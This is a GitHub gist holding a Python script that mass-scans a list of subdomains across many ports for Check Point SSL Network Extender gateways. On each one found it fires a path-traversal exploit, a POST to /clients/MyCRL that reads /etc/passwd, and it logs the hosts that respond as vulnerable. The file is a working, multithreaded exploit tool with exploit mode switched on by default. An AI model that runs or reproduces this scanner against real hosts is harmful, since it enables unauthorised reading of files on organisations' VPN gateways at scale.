Created
May 31, 2024 07:17
-
-
Save YasserGersy/b54c208b87d38752587beff43dfcfd92 to your computer and use it in GitHub Desktop.
fuzz your subdomains list against checkpoint path traversal
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| import sys,re | |
| import requests | |
| import concurrent.futures | |
| import threading | |
| import os | |
| import requests | |
| import socket | |
| from requests.packages.urllib3.exceptions import InsecureRequestWarning | |
| from termcolor import colored | |
| # Disable SSL warnings | |
| requests.packages.urllib3.disable_warnings(InsecureRequestWarning) | |
| debug=True==False | |
| file_lock = threading.Lock() | |
| #tested=[] | |
| class COUNTERS: | |
| # Static fields (class-level variables) | |
| cancel=False | |
| REQUESTS =0 | |
| TARGETS =0 | |
| INSTANCES=0 | |
| VULNS=0 | |
| tested=[] | |
| @staticmethod | |
| def inc(s,i=1): | |
| if s=='REQUESTS': | |
| COUNTERS.REQUESTS=COUNTERS.REQUESTS+1 | |
| if s=='TARGETS': | |
| COUNTERS.TARGETS=COUNTERS.TARGETS+1 | |
| if s=='INSTANCES': | |
| COUNTERS.INSTANCES=COUNTERS.INSTANCES+1 | |
| if s=='VULNS': | |
| COUNTERS.VULNS=COUNTERS.VULNS+1 | |
| @staticmethod | |
| def tostr(): | |
| return f"[T:{COUNTERS.TARGETS}] [Req:{COUNTERS.REQUESTS}] [Instances:{COUNTERS.INSTANCES}] [Vuls:{COUNTERS.VULNS}] " | |
| def color_print(s,i): | |
| if i==1: | |
| print(colored(s, 'green')) | |
| elif i==2: | |
| print(colored(s, 'red')) | |
| elif i==3: | |
| print(colored(s, 'cyan')) | |
| else: | |
| print(s, 'white') | |
| def Print_Progress(s): | |
| print("\033[F\033[K "+s) | |
| def getHeaders(response): | |
| try: | |
| headers = response.headers | |
| headers_string = "\n".join(f"{key}: {value}" for key, value in headers.items()) | |
| return headers_string | |
| except requests.RequestException as e: | |
| return '' | |
| def jprint(s,color_level,same_line,remove_prevline): | |
| global debug | |
| if remove_prevline and debug: | |
| remove_prevline=False | |
| if color_level==1: | |
| s=colored(s,'green') | |
| elif color_level==2: | |
| s=colored(s, 'red') | |
| elif color_level==3: | |
| s=colored(s, 'cyan') | |
| else: | |
| s=colored(s, 'white') | |
| if remove_prevline: | |
| s="\033[F\033[K "+s | |
| if same_line: | |
| print(s, end=" ") | |
| else: | |
| print(s) | |
| def resolve_hostname(hostname): | |
| try: | |
| ip_address = socket.gethostbyname(hostname) | |
| return str(ip_address) | |
| except socket.gaierror: | |
| jprint(f"{COUNTERS.targets} E45 Unable to resolve IP address for hostname '{hostname}'.",2,False,False) | |
| return '' # | |
| def write_to_file(filename, content): | |
| try: | |
| with file_lock: | |
| with open(filename, 'a') as file: | |
| file.write(content + "\n") | |
| #print(f"Content written to {filename}: {content}") | |
| except Exception as e: | |
| jprint("E57"+str(e),2,False,False) | |
| pass | |
| #print(f"Error writing to {filename}: {e}") | |
| def ensure_ends_with_substring(input_string, substring): | |
| if not input_string.endswith(substring): | |
| return input_string + substring | |
| else: | |
| return input_string | |
| def remove_empty_and_duplicates(input_list): | |
| # Remove empty elements (falsy values) | |
| cleaned_list = [item for item in input_list if item] | |
| # Remove duplicates while preserving order | |
| unique_list = [] | |
| seen = set() | |
| for item in cleaned_list: | |
| if item not in seen and item!=0: | |
| unique_list.append(item) | |
| seen.add(item) | |
| return unique_list | |
| def print_banner(): | |
| banner_text = "\n-------------------\nCheckpointAutomator By YasserGersy exception@wearehackerone.com\n-------------------\n" | |
| jprint(banner_text,3,False,False) | |
| def stringline_to_valid_port(line): | |
| try: | |
| i= int(line.strip()) | |
| if i<1 or i>65535: | |
| return 0 | |
| return i | |
| except: | |
| jprint(f"E96 failed to parse:'{l}'",2,False,False) | |
| return 0 | |
| def read_file_lines_to_integers(filename): | |
| try: | |
| with open(filename, 'r', encoding='utf-8') as file: | |
| lines = file.readlines() | |
| integers_list = [stringline_to_valid_port(line) for line in lines] | |
| return integers_list | |
| except FileNotFoundError: | |
| jprint(f"E105: File '{filename}' not found.",2,False,False) | |
| return [265,443,80] | |
| def download_ports_file(url, filename): | |
| try: | |
| if not os.path.exists(filename): | |
| jprint(f"{filename} does not exist. Downloading from {url}...",2,False,False) | |
| response = requests.get(url, verify=False) | |
| if response.status_code == 200: | |
| with open(filename, 'wb') as file: | |
| file.write(response.content) | |
| jprint(f"{filename} downloaded successfully.",1,False,False) | |
| else: | |
| jprint(f"Error downloading {filename}. Status code: {response.status_code}",2,False,False) | |
| else: | |
| jprint(f" File found {filename} .",3,False,False) | |
| except requests.RequestException as e: | |
| jprint(f"E124: {e}",2,False,False) | |
| def get_ports(): | |
| url = "https://raw.githubusercontent.com/YasserGersy/Enums/master/Preserved/Ports/Checkpoint.Common.ports.txt" | |
| filename = "ports.txt" | |
| download_ports_file(url, filename) | |
| r= read_file_lines_to_integers(filename) | |
| jprint(" Found Ports "+str(len(r)),1,False,False) | |
| return r #list(set(r)) | |
| def process(hostnames,threadscount,ports,exploit): | |
| if len(hostnames)>0: | |
| with concurrent.futures.ThreadPoolExecutor(max_workers=threadscount) as executor: | |
| futures = [executor.submit(Test_host, hostname,ports,exploit) for hostname in hostnames] | |
| for future in concurrent.futures.as_completed(futures): | |
| response = future.result() | |
| def Is_vulnerable(url): | |
| try: | |
| url=ensure_ends_with_substring(url,'/clients/MyCRL') | |
| burp0_headers = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.5563.111 Safari/537.36", "Connection": "close"} | |
| burp0_data = 'aCSHELL/../../../../../../../etc/passwd' | |
| r=requests.post(url, headers=burp0_headers, data=burp0_data,verify=False) | |
| rs=r.text | |
| if re.search(r'root:.:\d:\d', r.text) : | |
| return 'Vulnerable' | |
| jprint("Response: "+r.text,2,False,False) | |
| except Exception as es: | |
| rs=str(es) | |
| jprint("E169: "+str(es),2,False,True) | |
| return 'Not Vulnerable ' | |
| def Test_host(hostname,ports,exploit): | |
| COUNTERS.inc("TARGETS") | |
| found=False | |
| #global tested | |
| ip=resolve_hostname(hostname) | |
| if len(ip)<7 or ip in COUNTERS.tested or hostname in COUNTERS.tested : | |
| jprint(f" [-][{COUNTERS.TARGETS}] Skipped {hostname}:{ip}",2,False,False) | |
| return | |
| COUNTERS.tested.append(ip) | |
| COUNTERS.tested.append(hostname) | |
| found_url='' | |
| rc=0 | |
| jprint(f"[+]{COUNTERS.TARGETS} {hostname}:{ip}",2,False,False) | |
| for proto in ["https"]: # ,"http"]: | |
| for port in ports: | |
| if found or COUNTERS.cancel: | |
| break | |
| COUNTERS.inc("REQUESTS") | |
| url=f"{proto}://{hostname.strip()}:{port}/" | |
| jprint(f" [+] {COUNTERS.tostr()} Testing '{url}' ",2,True,True) | |
| stcode=0 | |
| state='' | |
| try: | |
| response = requests.get(url, verify=False) | |
| stcode=response.status_code | |
| jprint(f" [+]{COUNTERS.TARGETS} [Url:{url}] [Status:{response.status_code}]",3,False,False) | |
| found='<title>Check Point SSL Network Extender' in response.text or 'Check Point SVN' in getHeaders(response) | |
| if found: | |
| found_url=url | |
| write_to_file('Active.txt',f'{response.status_code} : {ip} : {url}') | |
| except KeyboardInterrupt: | |
| jprint(" [-]{COUNTERS.TARGETS} Program terminated by user2.",2,False,False) | |
| COUNTERS.cancel=True | |
| exit() | |
| except requests.RequestException as e: | |
| emsg=state=(str(e)) | |
| if ('ConnectTimeoutError' in emsg or 'connection was forcibly' in emsg or 'Max retries exceeded with url:' in emsg): | |
| emsg=state="ConnectionFailed" | |
| #Print_Progress("\033[F\033[K"+" E214 "+emsg) | |
| vuln='' | |
| if found and exploit: | |
| vuln=Is_vulnerable(found_url) | |
| vs=f"[{vuln}]" if vuln else '' | |
| res=f" [+]{COUNTERS.tostr()} -{rc}[StatusCode:{stcode}{state}] [isCheckPoint:{found}] {vs} [{ip}] [{url}]"+("\n" if (found) else '') | |
| if found: | |
| write_to_file("results.txt",res) | |
| COUNTERS.inc("INSTANCES") | |
| if vuln: | |
| COUNTERS.inc("VULNS") | |
| color_print(res,(1 if vuln else (2 if found else 3) )) | |
| def get_hostnames_from_file(filename): | |
| hostnames=[] | |
| try: | |
| if os.path.exists(filename): | |
| with open(filename, 'r', encoding='utf-8') as file: | |
| hostnames = [line.strip() for line in file] | |
| #hostnames=[resolve_hostname(h) for h in hostnames] | |
| hostnames=remove_empty_and_duplicates(hostnames) | |
| print("Testing Multiple Targets: "+str(len(hostnames))) | |
| else: | |
| hostnames=[filename] | |
| print("Testing Single Target: "+filename) | |
| except KeyboardInterrupt: | |
| jprint("\nE154 Program terminated by user1.",2,False,False) | |
| except FileNotFoundError: | |
| jprint(f"E156: File '{filename}' not found.",2,False,False) | |
| return hostnames | |
| if __name__ == "__main__": | |
| print_banner() | |
| if len(sys.argv) != 2: | |
| color_print("Usage: python script.py <filename>",2) | |
| else: | |
| try: | |
| input_filename = sys.argv[1] | |
| threadscount=50 | |
| ports=get_ports()[1:] | |
| exploit=True | |
| hostnames=get_hostnames_from_file(input_filename) | |
| color_print("\n----------\n",1) | |
| color_print(f"Running against [File: {input_filename}] [TARGETS:{len(hostnames)}] [Threads:{threadscount}] [Ports:{len(ports)}] [ExploitMode:{exploit}]",3) | |
| color_print("\n----------\n",1) | |
| process(hostnames,threadscount,ports,exploit) | |
| except KeyboardInterrupt: | |
| print("\nProgram terminated by user3.") | |
| exit(0) |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment